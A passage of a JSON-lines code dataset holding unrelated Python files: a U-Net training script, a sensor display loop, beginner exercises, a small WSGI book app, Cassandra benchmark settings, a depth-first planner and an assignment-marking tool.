intra_op_parallelism_threads=args.intraop_threads)\n\nSESS = tf.Session(config=CONFIG)\n\nK.backend.set_session(SESS)\n\nunet_model = unet(use_upsampling=args.use_upsampling,\n learning_rate=args.lr,\n n_cl_in=args.number_input_channels,\n n_cl_out=1, # single channel (greyscale)\n feature_maps = args.featuremaps,\n dropout=0.2,\n print_summary=args.print_model,\n channels_last = CHANNELS_LAST) # channels first or last\n\nunet_model.model.compile(optimizer=unet_model.optimizer,\n loss=unet_model.loss,\n metrics=unet_model.metrics)\n\n# Save best model to hdf5 file\nsaved_model_directory = os.path.dirname(args.saved_model)\ntry:\n os.stat(saved_model_directory)\nexcept:\n os.mkdir(saved_model_directory)\n\n# If there is a current saved file, then load weights and start from\n# there.\nif os.path.isfile(args.saved_model):\n unet_model.model.load_weights(args.saved_model)\n\ncheckpoint = K.callbacks.ModelCheckpoint(args.saved_model,\n verbose=1,\n save_best_only=True)\n\n# TensorBoard\ncurrentDT = datetime.datetime.now()\ntb_logs = K.callbacks.TensorBoard(log_dir=os.path.join(\n saved_model_directory, \"tensorboard_logs\", currentDT.strftime(\"%Y/%m/%d-%H:%M:%S\")), update_freq=\"batch\")\n\n# Keep reducing learning rate if we get to plateau\nreduce_lr = K.callbacks.ReduceLROnPlateau(monitor=\"val_loss\", factor=0.2,\n patience=5, min_lr=0.0001)\n\ncallbacks = [checkpoint, tb_logs, reduce_lr]\n\ntraining_data_params = {\"dim\": (args.patch_height, args.patch_width, args.patch_depth),\n \"batch_size\": args.bz,\n \"n_in_channels\": args.number_input_channels,\n \"n_out_channels\": 1,\n \"train_test_split\": args.train_test_split,\n \"validate_test_split\": args.validate_test_split,\n \"augment\": True,\n \"shuffle\": True,\n \"seed\": args.random_seed}\n\ntraining_generator = DataGenerator(\"train\", args.data_path,\n **training_data_params)\ntraining_generator.print_info()\n\nvalidation_data_params = {\"dim\": (args.patch_height, args.patch_width, args.patch_depth),\n \"batch_size\": 1,\n \"n_in_channels\": args.number_input_channels,\n \"n_out_channels\": 1,\n \"train_test_split\": args.train_test_split,\n \"validate_test_split\": args.validate_test_split,\n \"augment\": False,\n \"shuffle\": False,\n \"seed\": args.random_seed}\nvalidation_generator = DataGenerator(\"validate\", args.data_path,\n **validation_data_params)\nvalidation_generator.print_info()\n\n# Fit the 
model\n\"\"\"\nKeras Data Pipeline using Sequence generator\nhttps://www.tensorflow.org/api_docs/python/tf/keras/utils/Sequence\n\nThe sequence generator allows for Keras to load batches at runtime.\nIt's very useful in the case when your entire dataset won't fit into\nmemory. The Keras sequence will load one batch at a time to\nfeed to the model. You can specify pre-fetching of batches to\nmake sure that an additional batch is in memory when the previous\nbatch finishes processing.\n\nmax_queue_size : Specifies how many batches will be prepared (pre-fetched)\nin the queue. Does not indicate multiple generator instances.\n\nworkers, use_multiprocessing: Generates multiple generator instances.\n\nnum_data_loaders is defined in argparser.py\n\"\"\"\n\nunet_model.model.fit_generator(training_generator,\n epochs=args.epochs, verbose=1,\n validation_data=validation_generator,\n callbacks=callbacks,\n max_queue_size=args.num_prefetched_batches,\n workers=args.num_data_loaders,\n use_multiprocessing=True) #False) # True seems to cause fork issue\n\n# Evaluate final model on test holdout set\ntesting_generator = DataGenerator(\"test\", args.data_path,\n **validation_data_params)\ntesting_generator.print_info()\n\nscores = unet_model.model.evaluate_generator(testing_generator, verbose=1)\nprint(\"Final model metrics on test dataset:\")\nfor idx, name in enumerate(unet_model.model.metrics_names):\n print(\"{} \\t= {}\".format(name, scores[idx]))\n\nstop_time = datetime.datetime.now()\nprint(\"Started script on {}\".format(start_time))\nprint(\"Stopped script on {}\".format(stop_time))\nprint(\"\\nTotal time for training model = {}\".format(stop_time - start_time))\n","sub_path":"3D/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"465847016","text":"#!/usr/bin/python3\n#\n# main.py shows vl53l0x tof reading on ht16k33 7-segment display\n#\n\nimport time\n\nfrom vl53l0x.api import VL53L0X\nfrom ht16k33.api import HT16K33\n\nif __name__== \"__main__\":\n tof = VL53L0X()\n led = HT16K33()\n\n tof.setup()\n led.setup()\n\n rest = 0.1\n while True:\n distance = tof.measure()\n led.display(distance)\n time.sleep(rest)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17005343","text":"# def hello ():\n# print (\"Hello world\")\n#\n#\n# hello()\n\n# def hello (name):\n# print (\"Hello\" + name)\n#\n#\n# hello(\"john\")\n#\ndef sum(a,b):\n c = a+b\n return c\n#\n#\n# x = sum(5,3)\n# print x\n#\n# print (sum(5,3))\n\n\na=3\nb=5\n\nprint (\"Sum of \" + str(a) + \" and \" + str(b) + \" is \" + str(sum(a,b)))\n","sub_path":"Olympiad Solutions/HW10/class 2.py","file_name":"class 2.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"64524329","text":"import logging\n\nformat=\"%(levelname)s: %(module)s, %(threadName)s, %(thread)d, %(message)s\"\nformater = logging.Formatter(format)\n\ndef QuConsolelogger(loggername, level):\t\n\tstreamH = logging.StreamHandler()\n\tlogger = logging.getLogger(loggername)\n\tstreamH.setFormatter(formater)\n\tlogger.addHandler(streamH)\n\tlogger.setLevel(level)\n\ndef QuFilelogger(loggername, level, fname):\n\tfileH = logging.FileHandler(fname, 'w+')\n\tlogger = 
logging.getLogger(loggername)\n\tfileH.setFormatter(formater)\n\tlogger.addHandler(fileH)\n\tlogger.setLevel(level)\n\n","sub_path":"py3lib/QuLogger.py","file_name":"QuLogger.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"632070479","text":"#!/usr/bin/env python\n\nimport asyncio\nimport websockets\nimport sys\n\npath = ''\nmsg = 'Ping'\nif len(sys.argv)>1: path = sys.argv[1]\nif len(sys.argv)>2: msg = ' '.join(sys.argv[2:])\n\n\nasync def hello():\n async with websockets.connect('ws://localhost:28000/{}'.format(path)) as websocket:\n await websocket.send(msg)\n try:\n print(await websocket.recv())\n except websockets.exceptions.ConnectionClosed:\n print(\"Connection closed.\")\n\nasyncio.get_event_loop().run_until_complete(hello())\n","sub_path":"testsock.py","file_name":"testsock.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"104255547","text":"result = open(\"courses.txt\",\"r\")\nsentence = result.readlines()\ndict = {}\nlist = []\ni=0\nfor count in sentence:\n\tdict[i] = count.strip()\n\tlist.append(count.strip())\n\ti=i+1\nprint(dict)\nprint(list)\n","sub_path":"Assignments/32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"453487779","text":"import re\n\nfrom bookdb import BookDB\n\nDB = BookDB()\n\nbase_url = \"localhost\"\nport = 8080\n\nurl = f\"http://{base_url}:{port}\"\n\n\ndef book(book_id):\n book_info = DB.title_info(book_id)\n if book_info is None:\n raise NameError\n response = f\"\"\"\n

<html>\n<body>\n<h1>{book_info.get('title')}</h1>\n<p>Author: {book_info.get('author')}</p>\n<p>Publisher: {book_info.get('publisher')}</p>\n<p>ISBN: {book_info.get('isbn')}</p>\n<a href=\"/books\">Back to List</a>\n    \"\"\"\n\n    response += \"</body></html>\"\n\n    return response\n\n\ndef books():\n    response = \"\"\"<html>\n<body>\n<h1>The Great Library of Nemo</h1>\n<ul>\n    \"\"\"\n    # NOTE: assumes each title dict carries an 'id' key that matches the\n    # /books/id... routing handled in application() below.\n    for title in DB.titles():\n        response += (\n            f\"\"\"<li><a href=\"/books/{title.get('id')}\">{title.get('title')}</a></li>\"\"\"\n        )\n\n    response += \"</ul></body></html>
\"\n\n return response\n\n\ndef resolve_path(path):\n funcs = {\n \"\": books,\n \"books\": books,\n \"book\": book,\n }\n\n path = path.strip(\"/\").split(\"/\")\n\n func_name = path[0]\n args = path[1:]\n\n try:\n func = funcs[func_name]\n except KeyError:\n raise NameError\n\n return func, args\n\n\ndef application(environ, start_response):\n status = \"200 OK\"\n headers = [(\"Content-type\", \"text/html\")]\n start_response(status, headers)\n\n try:\n if environ.get(\"PATH_INFO\") == \"/\":\n response_body = books()\n\n elif environ.get(\"PATH_INFO\") == \"/books\":\n response_body = books()\n\n elif environ.get(\"PATH_INFO\").startswith(\"/books/id\"):\n input_book_id = environ.get(\"PATH_INFO\").split(\"/\")[2]\n response_body = book(input_book_id)\n else:\n\n response_body = f\"\"\"\n {environ}\n \n \"\"\"\n except NameError:\n response_body = books()\n\n return [response_body.encode(\"utf8\")]\n\n\nif __name__ == \"__main__\":\n from wsgiref.simple_server import make_server\n\n srv = make_server(\"localhost\", 8080, application)\n srv.serve_forever()\n","sub_path":"bookapp.py","file_name":"bookapp.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"516269181","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# conf.py sets all properties/parameters for the experiments.\n\n# The parameters consist of server(Cassandra) parameters, client(YCSB) parameters and algorithm parameters.\n# Attention!!!\n# Each parameter list better has its values in a partial order\n# So that the experimental results can be plotted in a reasonable way.\n\n# Set Cassandra/server ip list:\nip_list = ['127.0.0.61', '127.0.0.62', '127.0.0.61',\n '127.0.0.64', '127.0.0.65', '127.0.0.66',\n '127.0.0.67', '127.0.0.68', '127.0.0.69']\n\n# --> Set server parameters:\n# Attention:\n# These parameters are only suitable for Cassandra.\n# Among these, snitch_strategy_list, read_process_list, server_delay_in_ms_list are only applied for hacked Cassandra.\n\ntopology = \"'NetworkTopologyStrategy'\"\n# replica_factor_list = [\"'dc1' : 3, 'dc2' : 1, 'dc3' : 1\",\n# \"'dc1' : 1, 'dc2' : 1, 'dc3' : 1\",\n# \"'dc1' : 3, 'dc2' : 3, 'dc3' : 3\"]\nreplica_factor_list = ['1_1_1', '3_1_1', '3_3_3']\ndefault_replica_factor = '3_1_1'\n\nwrite_consistency_level_list = ['QUORUM']\ndefault_write_consistency_level = 'QUORUM'\n\nread_consistency_level_list = ['QUORUM', 'EACH_QUORUM']\ndefault_read_consistency_level = 'QUORUM'\n\n# read_repair_chance_list = [(0.0, 0.0), (0.2, 0.1), (0.3, 0.2), (0.4, 0.3)]\ndc_local_read_repair_chance_list = ['0.0', '0.2', '0.3', '0.4']\ndefault_dc_local_read_repair_chance = '0.0'\n\nread_repair_chance_list = ['0.0', '0.1', '0.2', '0.3']\ndefault_read_repair_chance = '0.0'\n\nload_balancing_strategy_list = ['rr', 'globalaware', 'localaware']\ndefault_load_balancing_strategy = 'rr'\n\nlb_dict = {0: \" -db CLTradeoffCassandraDB\", 1: \" -db CLTradeoffCassandraDB\", 2: \" -db CLTradeoffCassandraDB\"}\n\nsnitch_strategy_list = ['None']\ndefault_snitch_strategy = 'None'\n\nread_process_list = ['simple', 'digest']\ndefault_read_process = 'simple'\n\nserver_delay_in_ms_list = ['0', '30', '50']\ndefault_server_delay_in_ms = '30'\n\n\n# --> Set client parameters:\n\n# Set the number of insert operation in the YCSB load phase.\n# Used to set YCSB's property: recordcount\ninsert_count_list = ['1', '10', '100']\ndefault_insert_count = '1'\n\n# Set operation numbers for each client in the YCSB run phase.\n# Won't be 
achieved if the actual speed is limited by the ops and the execution time.\noperation_count_list = ['3000000']\ndefault_operation_count = '3000000'\n\n# The number of write/read clients.\nclient_count_list = ['10', '30', '50']\ndefault_client_count = '30'\n\n# Set ops : all clients' total operation numbers per second.\n# ops_list = ['60', '120', '180', '240', '300']\nops_list = ['300']\ndefault_ops = '300'\n\nexecution_second_list = ['10', '60', '300']\ndefault_execution_second = '60'\n\n# wait_time = [' -p waitBase=10 -p waitRandom=1', ' -p waitBase=20 -p waitRandom=1', ' -p waitBase=40 -p waitRandom=1']\n# default_wait_time = ' -p waitBase=10 -p waitRandom=1'\n\n# Set the proportion of read/update operations in the YCSB run phase.\nread_proportion_list = ['0.50', '0.80', '0.95']\ndefault_read_proportion = '0.80'\n\n# Set the average delay between clients and servers when clients send requests.\nclient_delay_in_ms_list = ['0', '5', '20']\ndefault_client_delay_in_ms = '5'\n\n# --> Set algorithm parameters.\nread_round_list = ['2', '1']\nwrite_round_list = ['2']\n\n# --> Set experimental repeat times.\nrepeat = 1\n\n# Record all parameters in a given order.\n# Result process will use the following two lists.\n# Also, trace file is named in the form of the following property orders.\nalgorithm_name_list = ['write_round', 'read_round']\n\nproperty_name_list = ['replica_factor', 'write_consistency_level', 'read_consistency_level',\n                      'dc_read_repair_chance', 'local_read_repair_chance',\n                      'load_balancing_strategy', 'snitch_strategy', 'read_process', 'server_delay_in_ms',\n                      'insert_count', 'operation_count', 'client_count', 'ops',\n                      'execution_second', 'read_proportion', 'client_delay_in_ms',\n                      ]\nproperty_values_list = [replica_factor_list, write_consistency_level_list, read_consistency_level_list,\n                        dc_local_read_repair_chance_list, read_repair_chance_list,\n                        load_balancing_strategy_list,\n                        snitch_strategy_list, read_process_list, server_delay_in_ms_list,\n                        insert_count_list, operation_count_list, client_count_list,\n                        ops_list, execution_second_list, read_proportion_list, client_delay_in_ms_list,\n                        ]\nproperty_map = dict(zip(property_name_list, property_values_list))\n\n# Set default parameter values.\ndefault_value_list = [default_replica_factor, default_write_consistency_level, default_read_consistency_level,\n                      default_dc_local_read_repair_chance, default_read_repair_chance,\n                      default_load_balancing_strategy,\n                      default_snitch_strategy, default_read_process, default_server_delay_in_ms,\n                      default_insert_count, default_operation_count, default_client_count,\n                      default_ops, default_execution_second, default_read_proportion, default_client_delay_in_ms\n                      ]\ndefault_property_value_map = dict(zip(property_name_list, default_value_list))\n\n\n# You can set tunable parameters here.\nparameter_name_list = [\"client_count\", \"ops\", \"read_proportion\", \"replica_factor\", \"read_consistency_level\"]\nparameter_values_map = dict((name, property_map[name]) for name in parameter_name_list)\n\n\nif __name__ == '__main__':\n    print ('Default parameter-values:{}'.format(default_property_value_map))\n    print (\"All tunable parameters:{}\".format(parameter_values_map))","sub_path":"ycsb/bin/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
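# --- Editor's sketch (not one of the dataset records) -----------------------
# conf.py above zips property_name_list with property_values_list and with
# default_value_list, so a runner usually sweeps one tunable parameter while
# pinning the rest to their defaults. `run_experiment` is a hypothetical
# stand-in for the actual YCSB/Cassandra launcher, which the record omits.
from conf import parameter_values_map, default_property_value_map

def run_experiment(settings):
    print(settings)  # placeholder: launch YCSB with these property values

def sweep(parameter_name):
    for value in parameter_values_map[parameter_name]:
        settings = dict(default_property_value_map)  # start from the defaults
        settings[parameter_name] = value             # override only the swept knob
        run_experiment(settings)

sweep('read_consistency_level')  # runs QUORUM, then EACH_QUORUM
# -----------------------------------------------------------------------------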
{"seq_id":"282550607","text":"#!/usr/bin/env python3\n\ndef insertion_sort(list):\n    '''\n    A python implementation of insertion sort\n    '''\n\n    for i in range(1, len(list)):\n        item = list[i]\n\n        j = i - 1\n        while j >= 0 and item < list[j]:\n            list[j+1] = list[j]\n            j -= 1\n\n        list[j+1] = item\n\n    return list\n","sub_path":"sortanalytics/insertionsort_api.py","file_name":"insertionsort_api.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"646726337","text":"\nclass Person:\n    age = 5\n\n    def __repr__(self):\n        return repr(self.age)\n\nprint(Person)\nprint(repr(Person()))\n\n\n# Create a text file\n\nfile = open(\"testfile.txt\", \"w\")\n\nfile.write(\"Hello World\")\nfile.write(\"\\n\")\nfile.write(\"This is our new text file\")\nfile.write(\"and this is another line.\")\nfile.write(\"Why? Because we can.\")\n\nfile.close()\n\n# Reading a Text File in Python\n\n# prints the entire file on one line\nfile = open(\"testfile.txt\", \"r\")\n#print(file.read())\n\n# reads the first five characters of stored data and returns it as a string:\n#print(file.read(5))\n\n\n# If you want to read a file line by line – as opposed to pulling the content of the entire file at once – then you use the readline() function.\n#print(file.readline())\n\n\n\nfile2 = open(\"testfile2.txt\", \"w\")\n\nfile2.write(\"Hello World\")\nfile2.write(\"\\n\")\nfile2.write(\"This is our new text file\")\nfile2.write(\"\\n\")\nfile2.write(\"and this is another line.\")\nfile2.write(\"\\n\")\nfile2.write(\"Why? Because we can.\")\n\nfile2.close()\n\n\n\n# Returns a certain amount of characters\nfile2 = open(\"testfile.txt\", \"r\")\n#print(file2.readline(8))\n\n\n\n# But what if we wanted to return every line in the file, properly separated? (returns a list)\n#print(file2.readlines())\n\n\n\n# Looping over a file object\n# When you want to read – or return – all the lines from a file in a more memory-efficient and faster manner, you can loop over the file object.\n\n#for line in file2:\n#    print(line)\n\n'''\n\n\n# With Statement\n\n\nYou can also work with file objects using the with statement. \nIt is designed to provide much cleaner syntax and exception handling when you are working with code. \nThat explains why it’s good practice to use the with statement where applicable. 
\n\n'''\n\nwith open(\"testfile.txt\") as file:\n data = file.read()\n\n\nwith open(\"testfile.txt\") as f:\n for line in f:\n print(line)\n\n\n","sub_path":"Basic/Files.py","file_name":"Files.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"397720369","text":"import turtle \nwin = turtle.Screen() \nt = turtle.Turtle()\n\n# add some display options\nt.pensize(4) # increase pensize (takes integer)\nt.pencolor(\"red\") # set pencolor (takes string)\nt.shape(\"turtle\")\n\n#commands from here to the last line can be replaced\n\n# draw a N sided polygon\nnumSides = int(input(\"How many sides in the polygon?\"))\n \nangle = 360 / numSides\nsides = range(numSides)\n# distance = 300 / numSides # try different values \ndistance = 80\n \nfor i in sides:\n t.forward(distance)\n t.left(angle)\n\n\n# end commands\nwin.mainloop() # Wait for user to close window\n","sub_path":"turtle/turtle8_polygon.py","file_name":"turtle8_polygon.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"560935601","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 5 16:01:39 2019\n\n@author: simon\n\"\"\"\n\nfrom DataLoader import DataLoader\nimport mxnet.ndarray as nd\n\nTRAIN = \"/home/simon/Documents/TFE/Data/train.json\"\nword2vec = \"/home/simon/Documents/TFE/Data/word2vec-google-news-300.gz\"\n\ndl = DataLoader(word2vec, 1, 5, 300, padding=nd.zeros(shape=300), unknown=nd.random_normal(shape=(300,)), train_file=TRAIN)\n\nfor batch in dl.generate():\n print(batch)\n break","sub_path":"Code/models/Attention Mechanism/dataloader_test.py","file_name":"dataloader_test.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"529556380","text":"import time\nimport bisect\nclass DepthFirstPlanner(object):\n\n \n def __init__(self, planning_env, visualize):\n self.planning_env = planning_env\n self.visualize = visualize\n self.nodes = dict()\n \n\n def Plan(self, start_config, goal_config):\n plan =[]\n nodelist =[]\n if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n self.planning_env.InitializePlot(goal_config)\n Lowerlimits = self.planning_env.lower_limits;\n Upperlimits = self.planning_env.upper_limits;\n #self.planning_env.discrete_env.resolution = 1\n\n obj = self.planning_env.discrete_env\n \n\n a = obj.ConfigurationToGridCoord(goal_config)\n b = obj.ConfigurationToGridCoord(start_config)\n targetnodeid = obj.GridCoordToNodeId(a)\n currentnodeid = obj.GridCoordToNodeId(b)\n\n start = currentnodeid\n visited = []\n stack = [currentnodeid]\n\n\n vertex = currentnodeid\n count = 0\n #visited, stack = set(), [start]\n while stack and (vertex != targetnodeid):\n \n\n if vertex not in visited:\n visited.append(vertex)\n\n for value in (self.planning_env.GetSuccessors(vertex)): \n stack.append(value)\n\n\n #print plan_id[count], count\n #print self.planning_env.discrete_env.NodeIdToConfiguration(plan_id[count-1]),self.planning_env.discrete_env.NodeIdToConfiguration(current)\n\n count = count + 1;\n\n \n prevvertex = vertex\n vertex = stack.pop()\n \n plannodeid = visited\n #if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n 
#self.planning_env.PlotEdge(self.planning_env.discrete_env.NodeIdToConfiguration(vertex),self.planning_env.discrete_env.NodeIdToConfiguration(plannodeid[len(plannodeid)-1]))\n \n nodelist.append(vertex)\n\n \n\n plannodeid.append(targetnodeid)\n\n \n\n\n\n for i in range(0,len(plannodeid)):\n temp = (obj.NodeIdToGridCoord(plannodeid[i]))\n plan.append(obj.GridCoordToConfiguration(temp))\n\n return plan","sub_path":"code/DepthFirstPlanner.py","file_name":"DepthFirstPlanner.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"319545567","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 13 15:21:10 2019\n\n@author: ashka\n\"\"\"\n\nfrom os.path import join\nimport yaml, sys\nfrom GAME.texMaker import texMaker\nfrom GAME.question import Question\nfrom GAME.answer import Answer\nfrom GAME.fileNameManager import FileNameManager\nimport GAME\nimport shutil\nimport os\nimport subprocess\nfrom distutils import dir_util\n\ndef load_assignment(path, qdb = None, verbose = False):\n file = open(path,'r')\n assign = yaml.load(file)\n file.close()\n \n if qdb is not None:\n assign.question_db = qdb\n\n for q in assign.question_qids:\n this_Question = Question(join(assign.question_db,q))\n assign.questions.append(this_Question)\n if verbose: print('question is added: %s' % q)\n \n return assign\n\nmarkingSchem={'ub': [79.999999999, 69.999999999, 59.999999999, 49.999999999, 0],'name':['HD', 'D', 'C', 'P', 'N']}\nclass Assignment():\n def __init__(self,question_db=None,question_list=None,name=None,assignment_num=0,assignmentName=None, studentID=None, weights=None):\n self.questions = []\n self.candidate_questions=question_list\n self.name = name\n self.assignment_num = assignment_num\n self.marks = []\n self.mark = None\n self.feedbacks = None\n self.question_db = question_db\n self.fromTexFile = False\n self.assignmentName = assignmentName\n self.studentID = studentID\n self.returnLetterMark = True\n if weights is not None:\n self.weights = weights\n \n self.compilers = ['pdflatex']\n self.markingSchem={'ub': [79.999999999, 69.999999999, 59.999999999, 49.999999999, 0],\n 'name':['HD', 'D', 'C', 'P', 'N']}\n @property\n def letterMark(self):\n return self.convertToLetter(self.mark)\n \n def convertToLetter(self, m):\n m = 0 if m is None else m\n ms = markingSchem \n sorted_zip = sorted(zip(ms['ub'], ms['name']), key = lambda t: t[0])\n letterMark = sorted_zip[0][1]\n for i in sorted_zip:\n if m>i[0]:\n letterMark = i[1]\n return letterMark\n \n \n def markToShow(self, m):\n if self.returnLetterMark:\n return self.convertToLetter(m)\n \n else:\n return \"{:4.1f}\\%\".format(m*100)\n \n def condolidate_tex(self):\n assign_tex = ['\\\\BN']\n for q in self.questions:\n assign_tex.append('\\\\item')\n if not isinstance(q.text.tex,list):\n tex_to_add = [q.text.tex]\n else:\n tex_to_add = q.text.tex\n \n assign_tex += tex_to_add\n assign_tex.append('\\\\EN')\n return assign_tex\n\n def make_assignment_pdf_from_tex_file(self,path,verbose=False):\n pathToFolder = join(self.question_db, self.assignmentName)\n pathToFiles = join(pathToFolder, 'files')\n dirPath = os.path.dirname(path2pdf(path))\n tempPath = join(dirPath, 'temp')\n \n q = Question(pathToFolder)\n #shutil.copytree(pathToFiles, dirPath, symlinks=False, ignore=None)\n \n\n dir_util.copy_tree(pathToFiles, tempPath)\n \n # compile\n\n oldPath = os.getcwd()\n os.chdir(tempPath)\n compileTexself(self.compilers, q.text.tex[0])\n 
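# Copy the compiled PDF back out of the scratch directory, then restore the working directory and delete the scratch tree.\n        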
shutil.copy(path2pdf(q.text.tex[0]),dirPath)\n os.chdir(oldPath)\n dir_util.remove_tree(tempPath)\n \n \n def write_assignment_tex_file(self,path):\n texMaker(self.condolidate_tex(), path, name=self.name,anum=self.assignment_num)\n\n def make_assignment_pdf(self,path):\n self.write_assignment_tex_file(path2tex(path))\n makePdf(self.compilers,path)\n \n def save_input_files(self,directory):\n for q in self.questions:\n \n fnm = FileNameManager(self.studentID, self.assignment_num, q.qid)\n savingPath = join(directory, fnm.getInputFileName())\n q.text.save_inputs(savingPath)\n\n\n def save(self,path):\n '''\n with open(path, 'wb') as output:\n pickle.dump(self, output, pickle.HIGHEST_PROTOCOL)\n '''\n assignment_questions = self.questions.copy()\n assignment_mark = None\n assignment_feedbacks = None\n if self.mark is not None:\n assignment_mark = self.mark.copy()\n if self.feedbacks is not None:\n assignment_feedbacks = self.feedbacks.copy()\n \n self.questions = []\n self.mark = None\n self.feedbacks = None\n \n file = open(path,'w')\n yaml.dump(self, file)\n file.close()\n \n self.questions = assignment_questions\n self.mark = assignment_mark\n self.feedbacks = assignment_feedbacks\n \n\n \n def generate_question_list(self,verbose=False):\n for q in self.candidate_questions:\n \n \n self.questions.append(Question(join(self.question_db,q)))\n if verbose: print('question is added: %s' % q)\n self.get_question_qids()\n \n \n \n def get_question_qids(self):\n self.question_qids = []\n for q in self.questions:\n self.question_qids.append(q.qid)\n \n \n def mark_and_get_feedbacks(self,result_path_list):\n self.mark = 0 \n self.feedbacks = []\n for i, q in enumerate(self.questions):\n print(result_path_list[i])\n r = q.marking.result_loader(result_path_list[i])\n try:\n m, f = q.marking.marker(q.text.inputs, r)\n except Exception as e:\n m = None\n errorString = 'Marker encountered a problem! 
Error: %s' % repr(e)\n errorString = errorString.replace('_','\\_')\n errorString = errorString.replace('$','\\$')\n f = [errorString]\n m = 0 if m is None else m\n \n self.marks.append(m)\n \n if 'weights' in self.__dict__:\n self.mark += m * self.weights[i]\n else:\n self.mark += m / len(self.questions)\n \n self.feedbacks.append('Feedback for %s' % q.qid)\n self.feedbacks += f\n self.feedbacks.append(\"Mark for this part = %s\" % self.markToShow(m))\n self.feedbacks.append(' \\\\noindent\\\\rule{8cm}{0.4pt} ')\n self.feedbacks.append(' \\\\noindent\\\\rule{8cm}{0.4pt} ')\n self.feedbacks.append(\"\\\\textbf{Total mark = \" + self.letterMark + \"}\")\n self.feedbacks.append(' \\\\noindent\\\\rule{8cm}{0.4pt} ')\n \n \n \n def write_feedback_file(self,path,name=None,assignment_num=None):\n \n texMaker(self.feedbacks,path2tex(path),name=name,anum=assignment_num)\n \n\n\n def make_feedback_pdf(self,path,name=None,assignment_num=None):\n self.write_feedback_file(path2tex(path),name=name,assignment_num=assignment_num)\n makePdf(self.compilers, path)\n \n \n def path_manager(self):\n '''\n This should be organised better and should set results file names and \n other sutff.\n '''\n pass\n \n def get_marking_scheme(self):\n '''\n This should manage the marking scheme!\n '''\n pass\n \ndef compileTexself(compilers, texFile):\n #si = subprocess.STARTUPINFO()\n #si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n \n for command in compilers:\n subprocess.call(command + ' \"%s\"' % texFile, shell=True) \n\ndef path2tex(path):\n pre, ext = os.path.splitext(path)\n return pre + '.tex'\n\ndef path2pdf(path):\n pre, ext = os.path.splitext(path)\n return pre + '.pdf'\n\n\n\ndef makePdf(compilers, texFile):\n \n #shutil.copytree(src, dst, symlinks=False, ignore=None)\n \n dirPath = os.path.dirname(path2pdf(texFile))\n #shutil.copytree(src, dst, symlinks=True)\n shutil.copyfile(GAME.clsFile, join(dirPath, 'CURSUS.cls'))\n oldPath = os.getcwd()\n os.chdir(dirPath)\n #os.system(\"pdflatex %s\" % path)\n \n compileTexself(compilers, path2tex(texFile))\n '''\n si = subprocess.STARTUPINFO()\n si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n subprocess.call(\"pdflatex %s\" % path, startupinfo=si)\n '''\n os.chdir(oldPath)\n\nclass Student():\n def __init__(self, student_id):\n self.ID = student_id\n self.marks = {}\n self.feedbacks = {}\n\n def add_answer(self, input_path, result_path, question, verbous=True):\n\n qid = question.qid\n self.marks[qid], self.feedbacks[qid] = Answer(input_path, result_path, question).get_mark()\n if self.marks[qid] is None:\n if verbous: print(' Mark = None')\n else:\n if verbous: print(' Mark = %8.2f' % self.marks[qid])\n\n def make_feedback_file(self, out_path, anum=0):\n texMaker(self.feedbacks, path2tex(out_path), anum=anum)\n\n","sub_path":"GAME/assignment_old_2.py","file_name":"assignment_old_2.py","file_ext":"py","file_size_in_byte":8917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"200961732","text":"from __future__ import absolute_import, division\nfrom __future__ import print_function\nimport autograd.numpy as np\nimport autograd.numpy.random as npr\nfrom autograd import grad\nfrom autograd.util import flatten\nfrom optimizers import adam\nimport matplotlib.pyplot as plt\n\ndef init_random_params(scale, layer_sizes, rs=npr.RandomState(0)):\n \"\"\"Build a list of (weights, biases) tuples,\n one for each layer in the net.\"\"\"\n return [(scale * rs.randn(m, n), # weight matrix\n scale * rs.randn(n)) # bias vector\n 
